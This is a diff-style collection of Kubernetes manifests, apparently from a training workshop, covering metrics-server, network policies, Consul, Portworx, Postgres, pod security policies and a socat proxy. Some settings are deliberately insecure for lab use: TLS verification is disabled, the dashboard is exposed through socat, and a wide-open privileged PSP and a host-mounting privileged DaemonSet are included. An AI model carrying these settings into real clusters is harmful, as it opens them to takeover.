namespace: kube-system
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: metrics-server
|
||||
template:
|
||||
metadata:
|
||||
name: metrics-server
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
serviceAccountName: metrics-server
|
||||
volumes:
|
||||
# mount in tmp so we can safely use from-scratch images and/or read-only containers
|
||||
- name: tmp-dir
|
||||
emptyDir: {}
|
||||
containers:
|
||||
- name: metrics-server
|
||||
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
|
||||
imagePullPolicy: Always
|
||||
volumeMounts:
|
||||
- name: tmp-dir
|
||||
mountPath: /tmp
|
||||
args:
|
||||
- --kubelet-preferred-address-types=InternalIP
|
||||
- --kubelet-insecure-tls
|
||||
- --metric-resolution=5s
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
kubernetes.io/name: "Metrics-server"
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: metrics-server
|
||||
ports:
|
||||
- port: 443
|
||||
protocol: TCP
|
||||
targetPort: 443
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
- nodes/stats
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:metrics-server
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
14
k8s/netpol-allow-testcurl-for-testweb.yaml
Normal file
14
k8s/netpol-allow-testcurl-for-testweb.yaml
Normal file
@@ -0,0 +1,14 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-testcurl-for-testweb
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: testweb
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector:
|
||||
matchLabels:
|
||||
run: testcurl
|
||||
|
||||
10
k8s/netpol-deny-all-for-testweb.yaml
Normal file
10
k8s/netpol-deny-all-for-testweb.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: deny-all-for-testweb
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: testweb
|
||||
ingress: []
|
||||
|
||||
22
k8s/netpol-dockercoins.yaml
Normal file
22
k8s/netpol-dockercoins.yaml
Normal file
@@ -0,0 +1,22 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: deny-from-other-namespaces
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector: {}
|
||||
---
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-webui
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
ingress:
|
||||
- from: []
|
||||
|
||||
21
k8s/nginx-with-volume.yaml
Normal file
21
k8s/nginx-with-volume.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-volume
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
restartPolicy: OnFailure
|
||||
|
||||
95
k8s/persistent-consul.yaml
Normal file
95
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,95 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ pods ]
|
||||
verbs: [ get, list ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: orange
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
580
k8s/portworx.yaml
Normal file
580
k8s/portworx.yaml
Normal file
@@ -0,0 +1,580 @@
|
||||
# SOURCE: https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: stork-config
|
||||
namespace: kube-system
|
||||
data:
|
||||
policy.cfg: |-
|
||||
{
|
||||
"kind": "Policy",
|
||||
"apiVersion": "v1",
|
||||
"extenders": [
|
||||
{
|
||||
"urlPrefix": "http://stork-service.kube-system.svc:8099",
|
||||
"apiVersion": "v1beta1",
|
||||
"filterVerb": "filter",
|
||||
"prioritizeVerb": "prioritize",
|
||||
"weight": 5,
|
||||
"enableHttps": false,
|
||||
"nodeCacheCapable": false
|
||||
}
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: stork-account
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: stork-role
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["get", "list", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes"]
|
||||
verbs: ["get", "list", "watch", "create", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumeclaims"]
|
||||
verbs: ["get", "list", "watch", "update"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["list", "watch", "create", "update", "patch"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "list", "watch", "delete"]
|
||||
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
|
||||
resources: ["volumesnapshots"]
|
||||
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
|
||||
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
|
||||
resources: ["volumesnapshotdatas"]
|
||||
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["get", "create", "update"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
verbs: ["get"]
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: ["*"]
|
||||
resources: ["deployments", "deployments/extensions"]
|
||||
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
|
||||
- apiGroups: ["*"]
|
||||
resources: ["statefulsets", "statefulsets/extensions"]
|
||||
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: stork-role-binding
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: stork-account
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: stork-role
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: stork-service
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
name: stork
|
||||
ports:
|
||||
- protocol: TCP
|
||||
port: 8099
|
||||
targetPort: 8099
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ""
|
||||
labels:
|
||||
tier: control-plane
|
||||
name: stork
|
||||
namespace: kube-system
|
||||
spec:
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
replicas: 3
|
||||
template:
|
||||
metadata:
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ""
|
||||
labels:
|
||||
name: stork
|
||||
tier: control-plane
|
||||
spec:
|
||||
containers:
|
||||
- command:
|
||||
- /stork
|
||||
- --driver=pxd
|
||||
- --verbose
|
||||
- --leader-elect=true
|
||||
- --health-monitor-interval=120
|
||||
imagePullPolicy: Always
|
||||
image: openstorage/stork:1.1.3
|
||||
resources:
|
||||
requests:
|
||||
cpu: '0.1'
|
||||
name: stork
|
||||
hostPID: false
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: "name"
|
||||
operator: In
|
||||
values:
|
||||
- stork
|
||||
topologyKey: "kubernetes.io/hostname"
|
||||
serviceAccountName: stork-account
|
||||
---
|
||||
kind: StorageClass
|
||||
apiVersion: storage.k8s.io/v1
|
||||
metadata:
|
||||
name: stork-snapshot-sc
|
||||
provisioner: stork-snapshot
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: stork-scheduler-account
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: stork-scheduler-role
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints"]
|
||||
verbs: ["get", "update"]
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["get"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["create", "patch", "update"]
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints"]
|
||||
verbs: ["create"]
|
||||
- apiGroups: [""]
|
||||
resourceNames: ["kube-scheduler"]
|
||||
resources: ["endpoints"]
|
||||
verbs: ["delete", "get", "patch", "update"]
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["delete", "get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["bindings", "pods/binding"]
|
||||
verbs: ["create"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods/status"]
|
||||
verbs: ["patch", "update"]
|
||||
- apiGroups: [""]
|
||||
resources: ["replicationcontrollers", "services"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: ["app", "extensions"]
|
||||
resources: ["replicasets"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: ["policy"]
|
||||
resources: ["poddisruptionbudgets"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumeclaims", "persistentvolumes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: stork-scheduler-role-binding
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: stork-scheduler-account
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: stork-scheduler-role
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: apps/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
component: scheduler
|
||||
tier: control-plane
|
||||
name: stork-scheduler
|
||||
name: stork-scheduler
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 3
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
component: scheduler
|
||||
tier: control-plane
|
||||
name: stork-scheduler
|
||||
spec:
|
||||
containers:
|
||||
- command:
|
||||
- /usr/local/bin/kube-scheduler
|
||||
- --address=0.0.0.0
|
||||
- --leader-elect=true
|
||||
- --scheduler-name=stork
|
||||
- --policy-configmap=stork-config
|
||||
- --policy-configmap-namespace=kube-system
|
||||
- --lock-object-name=stork-scheduler
|
||||
image: gcr.io/google_containers/kube-scheduler-amd64:v1.11.2
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 10251
|
||||
initialDelaySeconds: 15
|
||||
name: stork-scheduler
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 10251
|
||||
resources:
|
||||
requests:
|
||||
cpu: '0.1'
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: "name"
|
||||
operator: In
|
||||
values:
|
||||
- stork-scheduler
|
||||
topologyKey: "kubernetes.io/hostname"
|
||||
hostPID: false
|
||||
serviceAccountName: stork-scheduler-account
|
||||
---
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: portworx-service
|
||||
namespace: kube-system
|
||||
labels:
|
||||
name: portworx
|
||||
spec:
|
||||
selector:
|
||||
name: portworx
|
||||
ports:
|
||||
- name: px-api
|
||||
protocol: TCP
|
||||
port: 9001
|
||||
targetPort: 9001
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: px-account
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: node-get-put-list-role
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes"]
|
||||
verbs: ["watch", "get", "update", "list"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["delete", "get", "list"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumeclaims", "persistentvolumes"]
|
||||
verbs: ["get", "list"]
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["get", "list", "update", "create"]
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["podsecuritypolicies"]
|
||||
resourceNames: ["privileged"]
|
||||
verbs: ["use"]
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: node-role-binding
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: px-account
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: node-get-put-list-role
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: portworx
|
||||
---
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: px-role
|
||||
namespace: portworx
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["get", "list", "create", "update", "patch"]
|
||||
---
|
||||
kind: RoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: px-role-binding
|
||||
namespace: portworx
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: px-account
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: Role
|
||||
name: px-role
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: portworx
|
||||
namespace: kube-system
|
||||
annotations:
|
||||
portworx.com/install-source: "https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true"
|
||||
spec:
|
||||
minReadySeconds: 0
|
||||
updateStrategy:
|
||||
type: RollingUpdate
|
||||
rollingUpdate:
|
||||
maxUnavailable: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: portworx
|
||||
spec:
|
||||
affinity:
|
||||
nodeAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: px/enabled
|
||||
operator: NotIn
|
||||
values:
|
||||
- "false"
|
||||
- key: node-role.kubernetes.io/master
|
||||
operator: DoesNotExist
|
||||
hostNetwork: true
|
||||
hostPID: false
|
||||
containers:
|
||||
- name: portworx
|
||||
image: portworx/oci-monitor:1.4.2.2
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
["-c", "px-workshop", "-s", "/dev/loop4", "-b",
|
||||
"-x", "kubernetes"]
|
||||
env:
|
||||
- name: "PX_TEMPLATE_VERSION"
|
||||
value: "v4"
|
||||
|
||||
livenessProbe:
|
||||
periodSeconds: 30
|
||||
initialDelaySeconds: 840 # allow image pull in slow networks
|
||||
httpGet:
|
||||
host: 127.0.0.1
|
||||
path: /status
|
||||
port: 9001
|
||||
readinessProbe:
|
||||
periodSeconds: 10
|
||||
httpGet:
|
||||
host: 127.0.0.1
|
||||
path: /health
|
||||
port: 9015
|
||||
terminationMessagePath: "/tmp/px-termination-log"
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- name: dockersock
|
||||
mountPath: /var/run/docker.sock
|
||||
- name: etcpwx
|
||||
mountPath: /etc/pwx
|
||||
- name: optpwx
|
||||
mountPath: /opt/pwx
|
||||
- name: proc1nsmount
|
||||
mountPath: /host_proc/1/ns
|
||||
- name: sysdmount
|
||||
mountPath: /etc/systemd/system
|
||||
- name: diagsdump
|
||||
mountPath: /var/cores
|
||||
- name: journalmount1
|
||||
mountPath: /var/run/log
|
||||
readOnly: true
|
||||
- name: journalmount2
|
||||
mountPath: /var/log
|
||||
readOnly: true
|
||||
- name: dbusmount
|
||||
mountPath: /var/run/dbus
|
||||
restartPolicy: Always
|
||||
serviceAccountName: px-account
|
||||
volumes:
|
||||
- name: dockersock
|
||||
hostPath:
|
||||
path: /var/run/docker.sock
|
||||
- name: etcpwx
|
||||
hostPath:
|
||||
path: /etc/pwx
|
||||
- name: optpwx
|
||||
hostPath:
|
||||
path: /opt/pwx
|
||||
- name: proc1nsmount
|
||||
hostPath:
|
||||
path: /proc/1/ns
|
||||
- name: sysdmount
|
||||
hostPath:
|
||||
path: /etc/systemd/system
|
||||
- name: diagsdump
|
||||
hostPath:
|
||||
path: /var/cores
|
||||
- name: journalmount1
|
||||
hostPath:
|
||||
path: /var/run/log
|
||||
- name: journalmount2
|
||||
hostPath:
|
||||
path: /var/log
|
||||
- name: dbusmount
|
||||
hostPath:
|
||||
path: /var/run/dbus
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: px-lh-account
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: px-lh-role
|
||||
namespace: kube-system
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["get", "create", "update"]
|
||||
---
|
||||
kind: RoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: px-lh-role-binding
|
||||
namespace: kube-system
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: px-lh-account
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: Role
|
||||
name: px-lh-role
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: px-lighthouse
|
||||
namespace: kube-system
|
||||
labels:
|
||||
tier: px-web-console
|
||||
spec:
|
||||
type: NodePort
|
||||
ports:
|
||||
- name: http
|
||||
port: 80
|
||||
nodePort: 32678
|
||||
- name: https
|
||||
port: 443
|
||||
nodePort: 32679
|
||||
selector:
|
||||
tier: px-web-console
|
||||
---
|
||||
apiVersion: apps/v1beta2
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: px-lighthouse
|
||||
namespace: kube-system
|
||||
labels:
|
||||
tier: px-web-console
|
||||
spec:
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
selector:
|
||||
matchLabels:
|
||||
tier: px-web-console
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
tier: px-web-console
|
||||
spec:
|
||||
initContainers:
|
||||
- name: config-init
|
||||
image: portworx/lh-config-sync:0.2
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "init"
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /config/lh
|
||||
containers:
|
||||
- name: px-lighthouse
|
||||
image: portworx/px-lighthouse:1.5.0
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 80
|
||||
- containerPort: 443
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /config/lh
|
||||
- name: config-sync
|
||||
image: portworx/lh-config-sync:0.2
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "sync"
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /config/lh
|
||||
serviceAccountName: px-lh-account
|
||||
volumes:
|
||||
- name: config
|
||||
emptyDir: {}
|
||||
30
k8s/postgres.yaml
Normal file
30
k8s/postgres.yaml
Normal file
@@ -0,0 +1,30 @@
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: postgres
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: postgres
|
||||
serviceName: postgres
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: postgres
|
||||
spec:
|
||||
schedulerName: stork
|
||||
containers:
|
||||
- name: postgres
|
||||
image: postgres:10.5
|
||||
volumeMounts:
|
||||
- mountPath: /var/lib/postgresql/data
|
||||
name: postgres
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: postgres
|
||||
spec:
|
||||
accessModes: ["ReadWriteOnce"]
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
|
||||
39
k8s/psp-privileged.yaml
Normal file
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
15
k8s/registry.yaml
Normal file
15
k8s/registry.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: registry
|
||||
spec:
|
||||
containers:
|
||||
- name: registry
|
||||
image: registry
|
||||
env:
|
||||
- name: REGISTRY_HTTP_ADDR
|
||||
valueFrom:
|
||||
configMapKeyRef:
|
||||
name: registry
|
||||
key: http.addr
|
||||
|
||||
67
k8s/socat.yaml
Normal file
67
k8s/socat.yaml
Normal file
@@ -0,0 +1,67 @@
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "2"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: socat
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
app: socat
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
|
||||
image: alpine
|
||||
imagePullPolicy: Always
|
||||
name: socat
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
status: {}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
